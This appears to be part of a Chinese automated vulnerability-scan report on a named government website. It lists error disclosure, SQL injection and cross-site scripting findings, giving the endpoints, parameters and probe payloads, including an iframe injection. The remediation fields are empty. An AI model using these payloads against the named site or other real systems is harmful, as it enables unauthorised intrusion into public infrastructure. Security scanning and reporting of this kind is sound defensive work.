4. 漏洞
4.1. Web应用程序错误信息
表 1.
URL 方法 参数 Payload 风险
http://www.suiyangqu.gov.cn/e/search/search.aspx POST modelid title=%25E8%25BE%2593%25E5%2585%25A5%25E6%2590%259C%25E7%25B4%25A2%25E5%2585%25B3%25E9%2594%25AE%25E8%25AF%258D&siteid=1&modelid=4999999999999999999999 中危
表 2.
类型 描述
漏洞影响: 暂无
漏洞概述: 暂无
建议解决方案: 暂无
参考链接: http://www.php.net/manual/en/errorfunc.configuration.php#ini.display-errors
漏洞分类: CWE-209 WASC-13 OWASP-2013A5 OWASP-2017A6
4.2. SQL注入漏洞
表 3.
URL 方法 参数 Payload 风险
http://www.suiyangqu.gov.cn/e/search/search.aspx POST modelid title=%25E8%25BE%2593%25E5%2585%25A5%25E6%2590%259C%25E7%25B4%25A2%25E5%2585%25B3%25E9%2594%25AE%25E8%25AF%258D&siteid=1&modelid=4999999999999999999999 高危
表 4.
类型 描述
漏洞影响: 暂无
漏洞概述: 暂无
建议解决方案: 暂无
参考链接: http://sebug.net/category/Sql%E6%B3%A8%E5%85%A5 http://www.owasp.org/index.php/Injection_Flaws http://www.securiteam.com/securityreviews/5DP0N1P76E.html
漏洞分类: CWE-89 WASC-19 OWASP-2013A1 OWASP-2017A1
4.3. 跨站脚本攻击
表 5.
URL 方法 参数 Payload 风险
http://www.suiyangqu.gov.cn/index.aspx GET id sublanmuid=597&id="/><iframe/src=//www.163.com//>&lanmuid=50 高危